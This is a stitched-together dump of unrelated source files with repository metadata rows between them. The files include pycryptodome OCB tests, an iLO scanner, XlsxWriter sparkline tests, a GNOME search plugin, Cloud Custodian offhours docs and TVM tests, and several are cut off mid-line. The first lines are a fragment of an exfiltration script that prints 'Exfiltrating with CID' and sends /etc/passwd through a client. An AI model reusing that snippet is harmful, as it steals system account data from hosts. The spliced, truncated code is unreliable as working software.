a = struct.unpack('<LL', client.sequence) # Get CID used
a = (a[1] << 32) + a[0]
sys.stdout.write("[.]\tExfiltrating with CID: %s.\n" % a)
client.sendFile("/etc/passwd") # Exfil File
client.close() # Close
|
Haynie-Research-and-Development/jarvis | deps/lib/python3.4/site-packages/Cryptodome/SelfTest/Cipher/test_OCB.py | Python | gpl-2.0 | 25,029 | 0.00032 | # ===================================================================
#
# Copyright (c) 2014, Legrandin <helderijs@gmail.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ===================================================================
import os
import re
import unittest
from binascii import hexlify
from Cryptodome.Util.py3compat import b, tobytes, bchr, unhexlify
from Cryptodome.Util.strxor import strxor_c
from Cryptodome.Util.number import long_to_bytes
from Cryptodome.SelfTest.st_common import list_test_cases
from Cryptodome.Cipher import AES
from Cryptodome.Hash import SHAKE128
def get_tag_random(tag, length):
return SHAKE128.new(data=tobytes(tag)).read(length)
class OcbTests(unittest.TestCase):
key_128 = get_tag_random("key_128", 16)
nonce_96 = get_tag_random("nonce_128", 12)
data_128 = get_tag_random("data_128", 16)
def test_loopback_128(self):
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
pt = get_tag_random("plaintext", 16 * 100)
ct, mac = cipher.encrypt_and_digest(pt)
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
pt2 = cipher.decrypt_and_verify(ct, mac)
self.assertEqual(pt, pt2)
def test_nonce(self):
# Nonce is optional
AES.new(self.key_128, AES.MODE_OCB)
cipher = AES.new(self.key_128, AES.MODE_OCB, self.nonce_96)
ct = cipher.encrypt(self.data_128)
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
self.assertEqual(ct, cipher.encrypt(self.data_128))
def test_nonce_must_be_bytes(self):
self.assertRaises(TypeError, AES.new, self.key_128, AES.MODE_OCB,
nonce='test12345678')
def test_nonce_length(self):
# nonce cannot be empty
self.assertRaises(ValueError, AES.new, self.key_128, AES.MODE_OCB,
nonce=b(""))
# nonce can be up to 15 bytes long
for length in range(1, 16):
AES.new(self.key_128, AES.MODE_OCB, nonce=self.data_128[:length])
self.assertRaises(ValueError, AES.new, self.key_128, AES.MODE_OCB,
nonce=self.data_128)
def test_block_size_128(self):
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
self.assertEqual(cipher.block_size, AES.block_size)
# By default, a 15 bytes long nonce is randomly generated
nonce1 = AES.new(self.key_128, AES.MODE_OCB).nonce
nonce2 = AES.new(self.key_128, AES.MODE_OCB).nonce
self.assertEqual(len(nonce1), 15)
self.assertNotEqual(nonce1, nonce2)
def test_nonce_attribute(self):
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
self.assertEqual(cipher.nonce, self.nonce_96)
# By default, a 15 bytes long nonce is randomly generated
nonce1 = AES.new(self.key_128, AES.MODE_OCB).nonce
nonce2 = AES.new(self.key_128, AES.MODE_OCB).nonce
self.assertEqual(len(nonce1), 15)
self.assertNotEqual(nonce1, nonce2)
def test_unknown_parameters(self):
self.assertRaises(TypeError, AES.new, self.key_128, AES.MODE_OCB,
self.nonce_96, 7)
self.assertRaises(TypeError, AES.new, self.key_128, AES.MODE_OCB,
nonce=self.nonce_96, unknown=7)
# But some are only known by the base cipher
# (e.g. use_aesni consumed by the AES module)
AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96,
use_aesni=False)
def test_null_encryption_decryption(self):
for func in "encrypt", "de | crypt":
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
result = getattr(cipher, func)(b(""))
self.assertEqual(result, b(""))
def test_either_encrypt_or_decrypt(self):
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
c | ipher.encrypt(b("xyz"))
self.assertRaises(TypeError, cipher.decrypt, b("xyz"))
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
cipher.decrypt(b("xyz"))
self.assertRaises(TypeError, cipher.encrypt, b("xyz"))
def test_data_must_be_bytes(self):
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
self.assertRaises(TypeError, cipher.encrypt, 'test1234567890-*')
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
self.assertRaises(TypeError, cipher.decrypt, 'test1234567890-*')
def test_mac_len(self):
# Invalid MAC length
self.assertRaises(ValueError, AES.new, self.key_128, AES.MODE_OCB,
nonce=self.nonce_96, mac_len=7)
self.assertRaises(ValueError, AES.new, self.key_128, AES.MODE_OCB,
nonce=self.nonce_96, mac_len=16+1)
# Valid MAC length
for mac_len in range(8, 16 + 1):
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96,
mac_len=mac_len)
_, mac = cipher.encrypt_and_digest(self.data_128)
self.assertEqual(len(mac), mac_len)
# Default MAC length
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
_, mac = cipher.encrypt_and_digest(self.data_128)
self.assertEqual(len(mac), 16)
def test_invalid_mac(self):
from Cryptodome.Util.strxor import strxor_c
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
ct, mac = cipher.encrypt_and_digest(self.data_128)
invalid_mac = strxor_c(mac, 0x01)
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
self.assertRaises(ValueError, cipher.decrypt_and_verify, ct,
invalid_mac)
def test_hex_mac(self):
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
mac_hex = cipher.hexdigest()
self.assertEqual(cipher.digest(), unhexlify(mac_hex))
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
cipher.hexverify(mac_hex)
def test_message_chunks(self):
# Validate that both associated data and plaintext/ciphertext
# can be broken up in chunks of arbitrary length
auth_data = get_tag_random("authenticated data", 127)
plaintext = get_tag_random("plaintext", 127)
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
cipher.update(auth_data)
ciphertext, ref_mac = cipher.encrypt_and_digest(plaintext)
def break_up(data, chunk_length):
return [data[i:i+chunk_length] for i in range(0, len(data),
chunk_length)]
# Encryption
for chunk_length in 1, 2, 3, 7, 10, 13, 16, 40, 80, 128:
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_9 |
jonstacks13/ilo-utils | ilo_utils/utils.py | Python | bsd-3-clause | 1,788 | 0 | import socket
import threading
from xml.etree import ElementTree
import requests
class PortScan(threading.Thread):
def __init__(self, ip, port, timeout=2):
threading.Thread.__init__(self)
self.ip = ip
self.port = port
self.timeout = timeout
self.open = False
def run(self):
sock = socket.socket()
sock.settimeout(self.timeout)
try:
sock.connect((self.ip, self.port))
except socket.error:
self.open = False
else:
sock.close()
self.open = True
class ILOInfo(threading.Thread):
def __init__(self, host, timeout=2):
threading.Thread.__init__(self)
self.host = host
self.timeout = timeout
self.resp = None
self.serial = None
self.model = None
self.ilo_version = None
self.firmware = None
self.success = False
def | run(self):
url = 'http://{}/xmldata?item=all'.format(self.host)
try:
self.resp = requests.get(url, timeout=self.timeout)
except requests.exceptions.Timeout:
pass
except requests.exceptions.ConnectionError:
pass
else:
if self.resp.status_code == requests.codes.ok:
| self.success = True
tree = ElementTree.fromstring(self.resp.content)
hsi = tree.find('HSI')
if hsi is not None:
self.serial = hsi.find('SBSN').text.strip()
self.model = hsi.find('SPN').text.strip()
mp = tree.find('MP')
if mp is not None:
self.ilo_version = mp.find('PN').text.strip()
self.firmware = mp.find('FWRI').text.strip()
|
jvrsantacruz/XlsxWriter | xlsxwriter/test/worksheet/test_sparkline07.py | Python | bsd-2-clause | 14,757 | 0.002168 | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2015, John McNamara, jmcnamara@cpan.org
#
import unittest
from ...compatibility import StringIO
from ..helperfunctions import _xml_to_list
from ...worksheet import Worksheet
class TestAssembleWorksheet(unittest.TestCase):
"""
Test assembling a complete Worksheet file.
"""
def test_assemble_xml_file(self):
"""Test writing a worksheet with no cell data."""
self.maxDiff = None
fh = StringIO()
worksheet = Worksheet()
worksheet._set_filehandle(fh)
worksheet.select()
worksheet.name = 'Sheet1'
worksheet.excel_version = 2010
data = [-2, 2, 3, -1, 0]
worksheet.write_row('A1', data)
worksheet.write_row('A2', data)
worksheet.write_row('A3', data)
worksheet.write_row('A4', data)
worksheet.write_row('A5', data)
worksheet.write_row('A6', data)
worksheet.write_row('A7', data)
# Set up sparklines.
worksheet.add_sparkline('F1', {'range': 'A1:E1',
'type': 'column',
'high_point': 1})
worksheet.add_sparkline('F2', {'range': 'A2:E2',
'type': 'column',
'low_point': 1})
worksheet.add_sparkline('F3', {'range': 'A3:E3',
'type': 'column',
'negative_points': 1})
worksheet.add_sparkline('F4', {'range': 'A4:E4',
'type': 'column',
'first_point': 1})
worksheet.add_sparkline('F5', {'range': 'A5:E5',
'type': 'column',
'last_point': 1})
worksheet.add_sparkline('F6', {'range': 'A6:E6',
'type': 'column',
'markers': 1})
worksheet.add_sparkline('F7', {'range': 'A7:E7',
'type': 'column',
'high_point': 1,
'low_point': 1,
'negative_points': 1,
'first_point': 1,
'last_point': 1,
'markers': 1})
worksheet._assemble_xml_file()
exp = _xml_to_list("""
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
<dimension ref="A1:E7"/>
<sheetViews>
<sheetView tabSelected="1" workbookViewId="0"/>
</sheetViews>
<sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
<sheetData>
<row r="1" spans="1:5" x14ac:dyDescent="0.25">
<c r="A1">
<v>-2</v>
</c>
<c r="B1">
<v>2</v>
</c>
<c r="C1">
<v>3</v>
</c>
<c r="D1">
<v>-1</v>
</c>
<c r="E1">
<v>0</v>
</c>
</row>
<row r="2" spans="1:5" x14ac:dyDescent="0.25">
<c r="A2">
<v>-2</v>
</c>
<c r="B2">
<v>2</v>
</c>
<c r="C2">
<v>3</v>
</c>
<c r="D2">
<v>-1</v>
</c>
<c r="E2">
<v>0</v>
</c>
</row>
<row r="3" spans="1:5" x14ac:dyDescent="0.25">
<c r="A3">
<v>-2</v>
</c>
<c r="B3">
<v>2</v>
</c>
<c r="C3">
<v>3</v>
</c>
<c r="D3">
<v>-1</v>
</c>
<c r="E3">
<v>0</v>
</c>
</row>
<row r="4" spans="1:5" x14ac:dyDescent="0.25">
<c r="A4">
<v>-2</v>
</c>
<c r="B4">
<v>2</v>
</c>
<c r="C4">
<v>3</v>
</c>
<c r="D4">
<v>-1</v>
</c>
<c r="E4">
<v>0</v>
</c>
</row>
<row r="5" spans="1:5" x14ac:dyDescent="0.25">
<c r="A5">
<v>-2</v>
</c>
<c r="B5">
<v>2</v>
</c>
<c r="C5">
<v>3</v>
</c>
<c r="D5">
<v>-1</v>
</c>
<c r="E5">
<v>0</v>
</c>
</row>
<row r="6" spans="1:5" x14ac:dyDescent="0.25">
<c r="A6">
<v>-2</v>
</c>
<c r="B6">
<v>2</v>
</c>
| <c r="C6">
<v>3</v>
</c>
<c r="D6">
<v | >-1</v>
</c>
<c r="E6">
<v>0</v>
</c>
</row>
<row r="7" spans="1:5" x14ac:dyDescent="0.25">
<c r="A7">
<v>-2</v>
</c>
<c r="B7">
<v>2</v>
</c>
<c r="C7">
<v>3</v>
</c>
<c r="D7">
<v>-1</v>
</c>
<c r="E7">
<v>0</v>
</c>
</row>
</sheetData>
<pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
<extLst>
<ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{05C60535-1F16-4fd2-B633-F4F36F0B64E0}">
<x14:sparklineGroups xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
<x14:sparklineGroup type="column" displayEmptyCellsAs="gap" markers="1" high="1" low="1" first="1" last="1" negative="1">
<x14:colorSeries theme="4" tint="-0.499984740745262"/>
<x14:colorNegative theme="5"/>
<x14:colorAxis rgb="FF000000"/>
<x14:colorMarkers theme="4" tint="-0.499984740745262"/>
<x14:colorFirst theme="4" tint="0.39997558519241921 |
blamarvt/dhcpz | setup.py | Python | apache-2.0 | 662 | 0.042296 | #!/usr/bin/python
from setuptools import setup
setup(
name = "dhcpz",
version = "0.2.0",
author = [
"Nicholas VonHollen",
"Brian Lamar"
],
author_email = [
"nicholas.vonhollen@rackspace.com",
| "brian.lamar@rackspace.com",
],
license = "Apache License 2.0",
packages = ['dhcpz', 'dhcpz.handlers'],
package_dir = {"":"src/py"},
install_requires = ['gevent', 'netifaces'],
data_files = [
('/etc', ['conf/dhcpz.conf']),
('/etc/init.d', ['src/init | .d/dhcpz']),
('/usr/bin', ['src/bin/dhcpz']),
],
)
|
elbeardmorez/quodlibet | quodlibet/quodlibet/ext/events/searchprovider.py | Python | gpl-2.0 | 5,620 | 0 | # -*- coding: utf-8 -*-
# Copyright 2013 Christoph Reiter <reiter.christoph@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"""
For this plugin to work GNOME Shell needs this file:
/usr/share/gnome-shell/search-providers/io.github.quodlibet.QuodLibet-search-provider.ini
with the following content:
[Shell Search Provider]
DesktopId=quodlibet.desktop
BusName=io.github.quodlibet.QuodLibet.SearchProvider
ObjectPath=/io/github/quodlibet/QuodLibet/SearchProvider
Version=2
"""
import os
import sys
if os.name == "nt" or sys.platform == "darwin":
from quodlibet.plugins import PluginNotSupportedError
raise PluginNotSupportedError
import dbus
import dbus.service
from quodlibet import _
from quodlibet import app
from quodlibet.util.dbusutils import dbus_unicode_validate
from quodlibet.plugins.events import EventPlugin
from quodlibet.query import Query
from quodlibet.plugins import PluginImportException
from quodlibet.util.path import xdg_get_system_data_dirs
from quodlibet.qltk import Icons
def get_gs_provider_files():
"""Return all installed search provider files for GNOME Shell"""
ini_files = []
for d in xdg_get_system_data_dirs():
path = os.path.join(d, "gnome-shell", "search-providers")
try:
for entry in os.listdir(path):
if entry.endswith(".ini"):
ini_files.append(os.path.join(path, entry))
except EnvironmentError:
pass
return ini_files
def check_ini_installed():
"""Raise if no GNOME Shell ini file for Quod Libet is found"""
quodlibet_installed = False
for path in get_gs_provider_files():
try:
with open(path, "rb") as handle:
data = handle.read().decode("utf-8", "replace")
if SearchProvider.BUS_NAME in data:
quodlibet_installed = True
break
except EnvironmentError:
pass
if not quodlibet_installed:
raise PluginImportException(
_("No GNOME Shell search provider for "
"Quod Libet installed."))
class GnomeSearchProvider(EventPlugin):
PLUGIN_ID = "searchprovider"
PLUGIN_NAME = _("GNOME Search Provider")
PLUGIN_DESC = _("Allows GNOME Shell to search the library.")
PLUGIN_ICON = Icons.SYSTEM_SEARCH
def enabled(self):
self.obj = SearchProvider()
def disabled(self):
self.obj.remove_from_connection()
del self.obj
import gc
gc.collect()
ENTRY_ICON = (". GThemedIcon audio-mpeg gnome-mime-audio-mpeg "
"audio-x-generic")
def get_song_id(song):
return str(id(song))
def get_songs_for_ids(library, ids):
songs = []
ids = set(ids)
for song in library:
song_id = get_song_id(song)
if song_id in ids:
songs.append(song)
ids.discard(song_id)
if not ids:
break
return songs
class SearchProvider(dbus.service.Object):
PATH = "/io/github/quodlibet/QuodLibet/SearchProvider"
BUS_NAME = "io.github.quodlibet.QuodLibet.SearchProvider"
IFACE = "org.gnome.Shell.SearchProvider2"
def __init__(self):
bus = dbus.SessionBus()
name = dbus.service.BusName(self.BUS_NAME, bus)
super(SearchProvider, self).__init__(name, self.PATH)
@dbus.service.method(IFACE, in_signature="as", out_signature="as")
def GetInitialResultSet(self, terms):
if terms:
query = Query("")
for term in terms:
query &= Query(term)
songs = filter(query.search, app.library)
else:
songs = app.library.values()
ids = [get_song_id(s) for s in songs]
return ids
@dbus.service.method(IFACE, in_signature="asas", out_signature="as")
def GetSubsearchResultSet(self, previous_results, terms):
query = Query("")
for term in terms:
query &= Query(term)
songs = get_songs_for_ids(app.library, previous_results)
ids = [get_song_id(s) for s in songs if query.search(s)]
return ids
@dbus.service.method(IFACE, in_signature="as",
out_signature="aa{sv}")
def GetResultMetas(self, identifiers):
metas = []
for song in get_songs_for_ids(app.library, identifiers):
name = song("title")
description = song("~artist~title")
song_id = get_song_id(song)
meta = dbus.Dictionary({
"name": dbus_unicode_validate(name),
"id": song_id,
"description": dbus_unicode_vali | date(description),
"gicon": ENTRY_ICON,
}, signature="ss")
metas.append(meta)
return metas
@dbus.service.method(IFACE, in_signature="sasu")
def ActivateResult(self, identifier, terms, timestamp):
songs = | get_songs_for_ids(app.library, [identifier])
if not songs:
return
if app.player.go_to(songs[0], True):
app.player.paused = False
@dbus.service.method(IFACE, in_signature="asu")
def LaunchSearch(self, terms, timestamp):
try:
app.window.browser.filter_text(" ".join(terms))
except NotImplementedError:
pass
else:
app.present()
# the plugin is useless without the ini file...
check_ini_installed()
|
uclouvain/osis_louvain | base/views/learning_units/detail.py | Python | agpl-3.0 | 2,249 | 0.001335 | ############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2018 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public Lice | nse as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General P | ublic License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
############################################################################
from django.contrib.auth.decorators import login_required
from django.core.exceptions import PermissionDenied
from django.shortcuts import get_object_or_404, render
from base.models.person import Person
from base.views.learning_units.common import get_learning_unit_identification_context
@login_required
def learning_unit_identification(request, learning_unit_year_id):
person = get_object_or_404(Person, user=request.user)
context = get_learning_unit_identification_context(learning_unit_year_id, person)
learning_unit_year = context['learning_unit_year']
if learning_unit_year.is_external():
template = "learning_unit/external/read.html"
permission = 'base.can_access_externallearningunityear'
else:
template = "learning_unit/identification.html"
permission = 'base.can_access_learningunit'
if not person.user.has_perm(permission):
raise PermissionDenied
return render(request, template, context)
|
skygate/CodeSamples | python/abstract_base_classes/base.py | Python | unlicense | 507 | 0 | import abc
class BaseBroker(metaclass=abc.ABCMeta):
@abc.abstractmethod
def get | _contact_url(self, email):
""" Gets contact's profile URL from CRM """
pass
@abc.abstractmethod
def create_contact(self, email, first_name, last_name):
"""
Creates contact in CRM. and returns contact's URL
:param email Contact's email
:param first_name Contact's first_name
:param last_name Contact's last_n | ame
"""
pass
|
sixfeetup/cloud-custodian | c7n/filters/offhours.py | Python | apache-2.0 | 21,487 | 0.000558 | # Copyright 2015-2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Resource Scheduling Offhours
============================
Custodian provides for time based filters, that allow for taking periodic
action on a resource, with resource schedule customization based on tag values.
A common use is offhours scheduling for asgs and instances.
Features
========
- Flexible offhours scheduling with opt-in, opt-out selection, and timezone
support.
- Resume during offhours support.
- Can be combined with other filters to get a particular set (
resources with tag, vpc, etc).
- Can be combined with arbitrary actions
Policy Configuration
====================
We provide an `onhour` and `offhour` time filter, each should be used in a
different policy, they support the same configuration options:
- **weekends**: default true, whether to leave resources off for the weekend
- **weekend-only**: default false, whether to turn the resource off only on
the weekend
- **default_tz**: which timezone to utilize when evaluating time **(REQUIRED)**
- **tag**: which resource tag name to use for per-resource configuration
(schedule and timezone overrides and opt-in/opt-out); default is
``maid_offhours``.
- **opt-out**: Determines the behavior for resources which do not have a tag
matching the one specified for **tag**. Values can be either ``false`` (the
default) where the policy operates on an opt-in basis and resources must have
the tag in order to be acted on by the policy, or ``true`` where the policy
operates on an opt-out basis, and resources without the tag are acted on by
the policy.
- **onhour**: the default time to start/run resources, specified as 0-23
- **offhour**: the default time to stop/suspend resources, specified as 0-23
This example policy overrides most of the defaults for an offhour policy:
.. code-block:: yaml
policies:
- name: offhours-stop
resource: ec2
filters:
- type: offhour
weekends: false
default_tz: pt
tag: downtime
opt-out: true
onhour: 8
offhour: 20
Tag Based Configuration
=======================
Resources can use a special tag to override the default configuration on a
per-resource basis. Note that the name of the tag is configurable via the
``tag`` option in the policy; the examples below use the default tag name,
``maid_offhours``.
The value of the tag must be one of the following:
- **(empty)** or **on** - An empty tag value or a value of "on" implies night
and weekend offhours using the default time zone configured in the policy
(tz=est if unspecified) and the default onhour and offhour values configured
in the policy.
- **off** - If offhours is configured to run in opt-out mode, this tag can be
specified to disable offhours on a given instance. If offhours is configured
to run in opt-in mode, this tag will have no effect (the resource will still
be opted out).
- a semicolon-separated string composed of one or more of the following
components, which override the defaults specified in the policy:
* ``tz=<timezone>`` to evaluate with a resource-specific timezone, where
``<timezone>`` is either one of the supported timezone aliases defined in
:py:attr:`c7n.filters.offhours.Time.TZ_ALIASES` (such as ``pt``) or the name
of a geographic timezone identifier in
[IANA's tzinfo database](https://www.iana.org/time-zones), such as
``Americas/Los_Angeles``. *(Note all timezone aliases are
referenced to a locality to ensure taking into account local daylight
savings time, if applicable.)*
* ``off=(time spec)`` and/or ``on=(time spec)`` matching time specifications
supported by :py:class:`c7n.filters.offhours.ScheduleParser` as described
in the next section.
ScheduleParser Time Specifications
----------------------------------
Each time specification follows the format ``(days,hours)``. Multiple time
specifications can be combined in square-bracketed lists, i.e.
``[(days,hours),(days,hours),(days,hours)]``.
**Examples**::
# up mon-fri from 7am-7pm; eastern time
off=(M-F,19);on=(M-F,7)
# up mon-fri from 6am-9pm; up sun from 10am-6pm; pacific time
off=[(M-F,21),(U,18)];on=[(M-F,6),(U,10)];tz=pt
**Possible values**:
+------------+----------------------+
| field | values |
+============+======================+
| days | M, T, W, H, F, S, U |
+------------+----------------------+
| hours | 0, 1, 2, ..., 22, 23 |
+------------+----------------------+
Days can be specified in a range (ex. M-F).
Policy examples
===============
Turn ec2 instances on and off
.. code-block:: yaml
policies:
- name: offhours-stop
resource: ec2
filters:
- type: offhour
actions:
- stop
- name: offhours-start
resource: ec2
filters:
- type: onhour
actions:
- start
Here's doing the same with auto scale groups
.. code-block:: yaml
policies:
- name: asg-offhours-stop
resource: asg
filters:
- offhour
actions:
- suspend
- name: asg-onhours-start
resource: asg
filters:
- onhour
actions:
- resume
Additional policy examples and resource-type-specific information can be seen in
the :ref:`EC2 Offhours <ec2offhours>` and :ref:`ASG Offhours <asgoffhours>`
use cases.
Resume During Offhours
======================
These policies are evaluated hourly; during each run (once an hour),
cloud-custodian will act on **only** the resources tagged for that **exact**
hour. In other words, if a resource has an offhours policy of
stopping/suspending at 23:00 Eastern daily and starting/resuming at 06:00
Eastern daily, and you run cloud-custodian once an hour via Lambda, that
resource will only be stopped once a day sometime between 23:00 and 23:59, and
will only be started once a day sometime between 06:00 and 06:59. If the current
hour do | es not *exactly* match the hour specified in the policy, nothing will be
done at all.
As a result of this, if custodian stops an instance or suspends an ASG and you
need to start/resume it, you can safe | ly do so manually and custodian won't touch
it again until the next day.
ElasticBeanstalk, EFS and Other Services with Tag Value Restrictions
====================================================================
A number of AWS services have restrictions on the characters that can be used
in tag values, such as `ElasticBeanstalk <http://docs.aws.amazon.com/elasticbean
stalk/latest/dg/using-features.tagging.html>`_ and `EFS <http://docs.aws.amazon.
com/efs/latest/ug/API_Tag.html>`_. In particular, these services do not allow
parenthesis, square brackets, commas, or semicolons, or empty tag values. This
proves to be problematic with the tag-based schedule configuration described
above. The best current workaround is to define a separate policy with a unique
``tag`` name for each unique schedule that you want to use, and then tag
resources with that tag name and a value of ``on``. Note that this can only be
used in opt-in mode, not opt-out.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
# note we have to module import for our testing mocks
import datetime
import logging
from os.path import join
from dateutil import zoneinfo
from c7n.filters import Filter, FilterValidationError
from c7n.utils import type_schema, dumps
log = logging.getLogger('custodian.offhours')
def brackets_removed(u):
return u.translate({ord |
tqchen/tvm | tests/python/relay/test_backend_compile_engine.py | Python | apache-2.0 | 9,932 | 0.001208 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import numpy as np
import tvm
from tvm import te
import tvm.testing
from tvm import relay
from tvm import autotvm
from tvm import topi
from tvm.relay.testing import run_infer_type
from tvm.relay.testing.temp_op_attr import TempOpAttr
import tvm.testing
@autotvm.register_topi_compute("test/conv2d_1")
def _compute_conv2d_1(cfg, input, filter, strides, padding, dilation, out_dtype):
return topi.nn.conv2d_nchw(input, filter, strides, padding, dilation, out_dtype)
@autotvm.register_topi_schedule("test/conv2d_1")
def _schedule_conv2d_1(cfg, outs):
return topi.generic.schedule_co | nv2d_nchw(outs)
@autotvm.register_topi_compute("test/conv2d_2")
def _compute_conv2d_2(cfg, input, filter, strides, padding, dilation, out_dtype):
re | turn topi.nn.conv2d_nchw(input, filter, strides, padding, dilation, out_dtype)
@autotvm.register_topi_schedule("test/conv2d_2")
def _schedule_conv2d_2(cfg, outs):
return topi.generic.schedule_conv2d_nchw(outs)
def _compute_conv2d_3(input, filter, strides, padding, dilation, out_dtype):
return topi.nn.conv2d_nchw(input, filter, strides, padding, dilation, out_dtype)
def _schedule_conv2d_3(outs):
return topi.generic.schedule_conv2d_nchw(outs)
@tvm.target.override_native_generic_func("test_conv2d_strategy")
def _tmp_strategy(attrs, inputs, out_type, target):
strategy = relay.op.OpStrategy()
strategy.add_implementation(
relay.op.strategy.wrap_compute_conv2d(_compute_conv2d_1),
relay.op.strategy.wrap_topi_schedule(_schedule_conv2d_1),
name="conv2d_1",
plevel=10,
)
strategy.add_implementation(
relay.op.strategy.wrap_compute_conv2d(_compute_conv2d_2),
relay.op.strategy.wrap_topi_schedule(_schedule_conv2d_2),
name="conv2d_2",
plevel=15,
)
ic = inputs[0].shape[1]
with tvm.te.SpecializedCondition(ic >= 16):
strategy.add_implementation(
relay.op.strategy.wrap_compute_conv2d(_compute_conv2d_3),
relay.op.strategy.wrap_topi_schedule(_schedule_conv2d_3),
name="conv2d_3",
plevel=20,
)
return strategy
def _create_record(task_name, dshape, wshape, target, cost):
args = [te.placeholder(dshape), te.placeholder(wshape), (1, 1), (1, 1, 1, 1), (1, 1), "float32"]
task = autotvm.task.create(task_name, args, target)
cfg = autotvm.ConfigEntity(0, None, {}, [])
cfg.cost = cost
inp = autotvm.MeasureInput(target=target, task=task, config=cfg)
result = autotvm.MeasureResult(costs=(cost,), error_no=0, all_cost=-1, timestamp=-1)
return (inp, result)
def test_get_valid_implementations():
target = tvm.target.Target("llvm")
def _get_impls(dshape, wshape):
data = relay.var("data", shape=dshape)
weight = relay.var("wshape", shape=wshape)
out = relay.nn.conv2d(data, weight, padding=(1, 1))
out = run_infer_type(out)
return relay.backend.compile_engine.get_valid_implementations(
relay.op.get("nn.conv2d"),
out.attrs,
[te.placeholder(dshape), te.placeholder(wshape)],
out.checked_type,
target,
)
with TempOpAttr("nn.conv2d", "FTVMStrategy", _tmp_strategy):
impls = _get_impls((1, 8, 7, 7), (32, 8, 3, 3))
assert len(impls) == 2
